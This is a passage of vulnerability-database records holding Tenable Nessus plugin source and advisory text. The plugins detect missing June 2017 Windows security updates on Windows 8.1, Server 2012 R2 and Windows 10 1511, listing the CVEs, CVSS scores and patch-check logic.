\"CVE-2017-8553\",\n \"CVE-2017-8554\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98842,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98864,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98887,\n 98900,\n 98901,\n 98902,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98929,\n 98933,\n 98940,\n 98942,\n 98949\n );\n\n script_xref(name:\"MSKB\", value:\"4022717\");\n script_xref(name:\"MSFT\", value:\"MS17-4022717\");\n script_xref(name:\"MSKB\", value:\"4022726\");\n script_xref(name:\"MSFT\", value:\"MS17-4022726\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 June 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4022717\nor cumulative update 4022726. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8473,\n CVE-2017-8474, CVE-2017-8475, CVE-2017-8476,\n CVE-2017-8477, CVE-2017-8478, CVE-2017-8479,\n CVE-2017-8480, CVE-2017-8481, CVE-2017-8482,\n CVE-2017-8483, CVE-2017-8484, CVE-2017-8488,\n CVE-2017-8489, CVE-2017-8490, CVE-2017-8491,\n CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022726/windows-8-update-kb4022726\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5f83ad76\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4022717 or Cumulative update KB4022726.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkbs = make_list(\n '4022717', # 8.1 / 2012 R2 Security Only\n '4022726' # 8.1 / 2012 R2 Monthly Rollup\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Windows 8.1 / Windows Server 2012 R2\nif ( smb_check_rollup(os:\"6.3\", sp:0, rollup_date: \"06_2017\", bulletin:bulletin, rollup_kb_list:[4022717, 4022726]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:54", "description": "The remote Windows 10 version 1511 host is missing security update\nKB4022714. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0216,\n CVE-2017-0218, CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)", "edition": 41, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "KB4022714: Windows 10 Version 1511 June 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-8579", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8576", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2017-06-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022714.NASL", "href": "https://www.tenable.com/plugins/nessus/100759", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100759);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0216\",\n \"CVE-2017-0218\",\n \"CVE-2017-0219\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8494\",\n \"CVE-2017-8515\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8554\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98833,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98855,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98887,\n 98895,\n 98896,\n 98897,\n 98898,\n 98900,\n 98901,\n 98902,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98942,\n 98954,\n 98955,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022714\");\n script_xref(name:\"MSFT\", value:\"MS17-4022714\");\n\n script_name(english:\"KB4022714: Windows 10 Version 1511 June 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1511 host is missing security update\nKB4022714. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0216,\n CVE-2017-0218, CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the 